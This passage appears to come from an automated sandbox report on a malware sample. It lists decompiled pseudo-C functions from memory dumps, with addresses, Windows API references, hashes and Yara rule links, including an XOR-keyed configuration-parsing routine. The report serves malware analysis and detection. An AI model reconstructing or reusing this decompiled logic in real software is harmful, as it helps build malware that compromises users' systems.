                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2bbd274) == 0) {
						E02BB1F47();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2bbd274) == 1) {
						_t10 = E02BB4D07(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                                                                                                                0x02bb5971
                                                                                                                                                                                                                                0x02bb5972
                                                                                                                                                                                                                                0x02bb5975
                                                                                                                                                                                                                                0x02bb59a7
                                                                                                                                                                                                                                0x02bb59a9
                                                                                                                                                                                                                                0x02bb59a9
                                                                                                                                                                                                                                0x02bb5977
                                                                                                                                                                                                                                0x02bb5978
                                                                                                                                                                                                                                0x02bb598d
                                                                                                                                                                                                                                0x02bb5994
                                                                                                                                                                                                                                0x02bb5996
                                                                                                                                                                                                                                0x02bb5996
                                                                                                                                                                                                                                0x02bb5994
                                                                                                                                                                                                                                0x02bb5978
                                                                                                                                                                                                                                0x02bb59b1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(02BBD274), ref: 02BB597F
                                                                                                                                                                                                                                  • Part of subcall function 02BB4D07: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D1A
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(02BBD274), ref: 02BB599F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3834848776-0
                                                                                                                                                                                                                                • Opcode ID: c7023d83d4acb3de88286f9f52f9499dd64a5a114c026c2a1d38f1f55f5f709e
                                                                                                                                                                                                                                • Instruction ID: b4f709fdbb667935da354918d7efa549d0c852010554c08724fcc1dff6db7c7a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7023d83d4acb3de88286f9f52f9499dd64a5a114c026c2a1d38f1f55f5f709e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E04F21684527AF9B335774C908BFAAA51EF0DBA4F824595F6C5D2010C7D0C851CBB3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6FA6, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                                                                                			E02BB6FA6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2bbd2e0; // 0x273a5a8
				_t4 = _t15 + 0x2bbe39c; // 0x52f8944
				_t20 = _t4;
				_t6 = _t15 + 0x2bbe124; // 0x650047
				_t17 = E02BB6B85(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02BBA3CC(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                0x02bb6fb0
                                                                                                                                                                                                                                0x02bb6fb7
                                                                                                                                                                                                                                0x02bb6fb8
                                                                                                                                                                                                                                0x02bb6fb9
                                                                                                                                                                                                                                0x02bb6fba
                                                                                                                                                                                                                                0x02bb6fc0
                                                                                                                                                                                                                                0x02bb6fc5
                                                                                                                                                                                                                                0x02bb6fc5
                                                                                                                                                                                                                                0x02bb6fcf
                                                                                                                                                                                                                                0x02bb6fe1
                                                                                                                                                                                                                                0x02bb6fe8
                                                                                                                                                                                                                                0x02bb7016
                                                                                                                                                                                                                                0x02bb6fea
                                                                                                                                                                                                                                0x02bb6fec
                                                                                                                                                                                                                                0x02bb6ff1
                                                                                                                                                                                                                                0x02bb7013
                                                                                                                                                                                                                                0x02bb6ff3
                                                                                                                                                                                                                                0x02bb6ff6
                                                                                                                                                                                                                                0x02bb6ffd
                                                                                                                                                                                                                                0x02bb7002
                                                                                                                                                                                                                                0x02bb7004
                                                                                                                                                                                                                                0x02bb7004
                                                                                                                                                                                                                                0x02bb7009
                                                                                                                                                                                                                                0x02bb7009
                                                                                                                                                                                                                                0x02bb6ff1
                                                                                                                                                                                                                                0x02bb701d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6B85: SysFreeString.OLEAUT32(?), ref: 02BB6C64
                                                                                                                                                                                                                                  • Part of subcall function 02BBA3CC: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02BB1CB7,004F0053,00000000,?), ref: 02BBA3D5
                                                                                                                                                                                                                                  • Part of subcall function 02BBA3CC: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02BB1CB7,004F0053,00000000,?), ref: 02BBA3FF
                                                                                                                                                                                                                                  • Part of subcall function 02BBA3CC: memset.NTDLL ref: 02BBA413
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB7009
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397948122-0
                                                                                                                                                                                                                                • Opcode ID: 0103568e5381c36554bd568dfc21b971f443c1d94a3ac382b89e0b8b635539ff
                                                                                                                                                                                                                                • Instruction ID: b57f14d570459df545a9a3ca77b46c8c0db026d01c02e124e6db87e54a1048f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0103568e5381c36554bd568dfc21b971f443c1d94a3ac382b89e0b8b635539ff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33015E32900119BFDB139FA8CC00DEABBB9EF48350F814866F905A7061EBB1DA11D790
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BBAB22, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BBAB22() {

				E02BBABE6(0x2bbc344, 0x2bbd134); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x02bbab19
                                                                                                                                                                                                                                0x02bbab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 02BBAB19
                                                                                                                                                                                                                                  • Part of subcall function 02BBABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BBAC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: d72a85fd755b9e1e4079bcea22f16a7ca5669d9217e3684e09c5baede721516b
                                                                                                                                                                                                                                • Instruction ID: 9aa56b5ae0449548001c2173244ff471c0bf73ab17f23d9c4e5dd2e15303b762
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d72a85fd755b9e1e4079bcea22f16a7ca5669d9217e3684e09c5baede721516b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4B0128276E003BF306791086D13DF70A0FCFC4A20320C4DFF011C4100D4E01C410031
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BBAB07, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BBAB07() {

				E02BBABE6(0x2bbc344, 0x2bbd124); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x02bbab19
                                                                                                                                                                                                                                0x02bbab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 02BBAB19
                                                                                                                                                                                                                                  • Part of subcall function 02BBABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BBAC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 4c521ffc2417ddc60437e0a7a1cb7f43d66b51fb44eb776b505cb14751a0b4e6
                                                                                                                                                                                                                                • Instruction ID: 8c8584441f12f1c22fa54cc4c39a75049e5320fda1ed22ea15ebf285741aabe4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c521ffc2417ddc60437e0a7a1cb7f43d66b51fb44eb776b505cb14751a0b4e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEB0129276C003BF302751046D13CF70A4ECFC0A10320C4DFF011D4000D4E11C410031
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B814A8, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E02B814A8(void* __eax, intOrPtr _a4) {

				 *0x2b841d0 =  *0x2b841d0 & 0x00000000;
				_push(0);
				_push(0x2b841cc);
				_push(1);
				_push(_a4);
				 *0x2b841c8 = 0xc; // executed
				L02B81AEC(); // executed
				return __eax;
			}



                                                                                                                                                                                                                                0x02b814a8
                                                                                                                                                                                                                                0x02b814af
                                                                                                                                                                                                                                0x02b814b1
                                                                                                                                                                                                                                0x02b814b6
                                                                                                                                                                                                                                0x02b814b8
                                                                                                                                                                                                                                0x02b814bc
                                                                                                                                                                                                                                0x02b814c6
                                                                                                                                                                                                                                0x02b814cb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(02B81091,00000001,02B841CC,00000000), ref: 02B814C6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3907675253-0
                                                                                                                                                                                                                                • Opcode ID: 49e76f225beb65ed26ecdb789deab0832d3f8df03e8dda3299ec40bf868cad92
                                                                                                                                                                                                                                • Instruction ID: 1a6b030d1a9fc76c52697aed9fe87b5f4493b2a247f854ec476ea70058e5e25f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e76f225beb65ed26ecdb789deab0832d3f8df03e8dda3299ec40bf868cad92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BC04CB4591302A6F710FB41DC45F277E717760B49F100A44F51C351D0D3F510A4CA25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB5157, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB5157(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2bbd270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                0x02bb5163
                                                                                                                                                                                                                                0x02bb5169

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: a6db46a789df193fbde3ca3e78b8067294984980847723fbaa44caab62a7c41e
                                                                                                                                                                                                                                • Instruction ID: 89954a05bb13d0707ee519e51d2397c67bf453207d8fa799fddb6a19fcaf487c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6db46a789df193fbde3ca3e78b8067294984980847723fbaa44caab62a7c41e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AB01271C84100AFCE138B10DE08F057F31B750740F014822B24441060C2B14834EF14
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB9BED, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB9BED(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E02BB458D(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E02BB1007(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                                                                                                                                                                                                0x02bb9bf5
                                                                                                                                                                                                                                0x02bb9c0f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9c2b
                                                                                                                                                                                                                                0x02bb9c06
                                                                                                                                                                                                                                0x02bb9c0d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9c32

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,02BB4A10,3D02BBC0,80000002,02BB51FC,02BB2DE9,74666F53,4D4C4B48,02BB2DE9,?,3D02BBC0,80000002,02BB51FC,?), ref: 02BB9C12
                                                                                                                                                                                                                                  • Part of subcall function 02BB1007: SysAllocString.OLEAUT32(02BB2DE9), ref: 02BB1020
                                                                                                                                                                                                                                  • Part of subcall function 02BB1007: SysFreeString.OLEAUT32(00000000), ref: 02BB1061
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFreelstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3808004451-0
                                                                                                                                                                                                                                • Opcode ID: fb0436beb97456e3fc6dbf89557a7a4fcadfe858dec1fb49563a23301e212d96
                                                                                                                                                                                                                                • Instruction ID: 7975ba16c734410ab8d6944784daeb2040411de8f5c00b3b576e5f92975d5045
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb0436beb97456e3fc6dbf89557a7a4fcadfe858dec1fb49563a23301e212d96
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0793201424EBFDF029F90DD05EEA3FAAEF18395F048055BA1454061DBB2D5B1EFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 02BB235B, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E02BB235B(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x2bbd2dc; // 0x69b25f44
				if(E02BBA43F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x2bbd310 = _v8;
				}
				_t33 =  *0x2bbd2dc; // 0x69b25f44
				if(E02BBA43F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2bbd2dc; // 0x69b25f44
				if(E02BBA43F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2bbd270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2bbd2dc; // 0x69b25f44
						_t45 = E02BBA7ED(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2bbd278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2bbd2dc; // 0x69b25f44
						_t46 = E02BBA7ED(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2bbd27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2bbd2dc; // 0x69b25f44
						_t47 = E02BBA7ED(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2bbd280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2bbd2dc; // 0x69b25f44
						_t48 = E02BBA7ED(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2bbd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2bbd2dc; // 0x69b25f44
						_t49 = E02BBA7ED(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2bbd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2bbd2dc; // 0x69b25f44
						_t50 = E02BBA7ED(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2bbd284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2bbd2dc; // 0x69b25f44
								_t51 = E02BBA7ED(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02BB1685(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02BB7095();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2bbd2dc; // 0x69b25f44
								_t52 = E02BBA7ED(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02BB1685(0, _t52) != 0) {
								_t121 =  *0x2bbd364; // 0x52f95b0
								E02BB45CF(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2bbd2dc; // 0x69b25f44
								_t53 = E02BBA7ED(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2bbd2e0; // 0x273a5a8
								_t22 = _t54 + 0x2bbe252; // 0x616d692f
								 *0x2bbd30c = _t22;
								goto L60;
							} else {
								_t64 = E02BB1685(0, _t53);
								 *0x2bbd30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2bbd2dc; // 0x69b25f44
										_t56 = E02BBA7ED(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x2bbd2e0; // 0x273a5a8
										_t23 = _t57 + 0x2bbe79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02BB1685(0, _t56);
									}
									 *0x2bbd380 = _t58;
									HeapFree( *0x2bbd270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                                                                                                                                0x02bb235b
                                                                                                                                                                                                                                0x02bb235e
                                                                                                                                                                                                                                0x02bb237e
                                                                                                                                                                                                                                0x02bb238c
                                                                                                                                                                                                                                0x02bb238c
                                                                                                                                                                                                                                0x02bb2391
                                                                                                                                                                                                                                0x02bb23ab
                                                                                                                                                                                                                                0x02bb2613
                                                                                                                                                                                                                                0x02bb261a
                                                                                                                                                                                                                                0x02bb2621
                                                                                                                                                                                                                                0x02bb2621
                                                                                                                                                                                                                                0x02bb23b1
                                                                                                                                                                                                                                0x02bb23cd
                                                                                                                                                                                                                                0x02bb2601
                                                                                                                                                                                                                                0x02bb260b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb23d3
                                                                                                                                                                                                                                0x02bb23d3
                                                                                                                                                                                                                                0x02bb23d8
                                                                                                                                                                                                                                0x02bb23ee
                                                                                                                                                                                                                                0x02bb23da
                                                                                                                                                                                                                                0x02bb23da
                                                                                                                                                                                                                                0x02bb23e7
                                                                                                                                                                                                                                0x02bb23e7
                                                                                                                                                                                                                                0x02bb23f8
                                                                                                                                                                                                                                0x02bb23fa
                                                                                                                                                                                                                                0x02bb2404
                                                                                                                                                                                                                                0x02bb2409
                                                                                                                                                                                                                                0x02bb2409
                                                                                                                                                                                                                                0x02bb2404
                                                                                                                                                                                                                                0x02bb2410
                                                                                                                                                                                                                                0x02bb2426
                                                                                                                                                                                                                                0x02bb2412
                                                                                                                                                                                                                                0x02bb2412
                                                                                                                                                                                                                                0x02bb241f
                                                                                                                                                                                                                                0x02bb241f
                                                                                                                                                                                                                                0x02bb242a
                                                                                                                                                                                                                                0x02bb242c
                                                                                                                                                                                                                                0x02bb2436
                                                                                                                                                                                                                                0x02bb243b
                                                                                                                                                                                                                                0x02bb243b
                                                                                                                                                                                                                                0x02bb2436
                                                                                                                                                                                                                                0x02bb2442
                                                                                                                                                                                                                                0x02bb2458
                                                                                                                                                                                                                                0x02bb2444
                                                                                                                                                                                                                                0x02bb2444
                                                                                                                                                                                                                                0x02bb2451
                                                                                                                                                                                                                                0x02bb2451
                                                                                                                                                                                                                                0x02bb245c
                                                                                                                                                                                                                                0x02bb245e
                                                                                                                                                                                                                                0x02bb2468
                                                                                                                                                                                                                                0x02bb246d
                                                                                                                                                                                                                                0x02bb246d
                                                                                                                                                                                                                                0x02bb2468
                                                                                                                                                                                                                                0x02bb2474
                                                                                                                                                                                                                                0x02bb248a
                                                                                                                                                                                                                                0x02bb2476
                                                                                                                                                                                                                                0x02bb2476
                                                                                                                                                                                                                                0x02bb2483
                                                                                                                                                                                                                                0x02bb2483
                                                                                                                                                                                                                                0x02bb248e
                                                                                                                                                                                                                                0x02bb2490
                                                                                                                                                                                                                                0x02bb249a
                                                                                                                                                                                                                                0x02bb249f
                                                                                                                                                                                                                                0x02bb249f
                                                                                                                                                                                                                                0x02bb249a
                                                                                                                                                                                                                                0x02bb24a6
                                                                                                                                                                                                                                0x02bb24bc
                                                                                                                                                                                                                                0x02bb24a8
                                                                                                                                                                                                                                0x02bb24a8
                                                                                                                                                                                                                                0x02bb24b5
                                                                                                                                                                                                                                0x02bb24b5
                                                                                                                                                                                                                                0x02bb24c0
                                                                                                                                                                                                                                0x02bb24c2
                                                                                                                                                                                                                                0x02bb24cc
                                                                                                                                                                                                                                0x02bb24d1
                                                                                                                                                                                                                                0x02bb24d1
                                                                                                                                                                                                                                0x02bb24cc
                                                                                                                                                                                                                                0x02bb24d8
                                                                                                                                                                                                                                0x02bb24ee
                                                                                                                                                                                                                                0x02bb24da
                                                                                                                                                                                                                                0x02bb24da
                                                                                                                                                                                                                                0x02bb24e7
                                                                                                                                                                                                                                0x02bb24e7
                                                                                                                                                                                                                                0x02bb24f2
                                                                                                                                                                                                                                0x02bb2505
                                                                                                                                                                                                                                0x02bb2505
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb24f4
                                                                                                                                                                                                                                0x02bb24f4
                                                                                                                                                                                                                                0x02bb24fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb250f
                                                                                                                                                                                                                                0x02bb250f
                                                                                                                                                                                                                                0x02bb2511
                                                                                                                                                                                                                                0x02bb2527
                                                                                                                                                                                                                                0x02bb2513
                                                                                                                                                                                                                                0x02bb2513
                                                                                                                                                                                                                                0x02bb2520
                                                                                                                                                                                                                                0x02bb2520
                                                                                                                                                                                                                                0x02bb252b
                                                                                                                                                                                                                                0x02bb252d
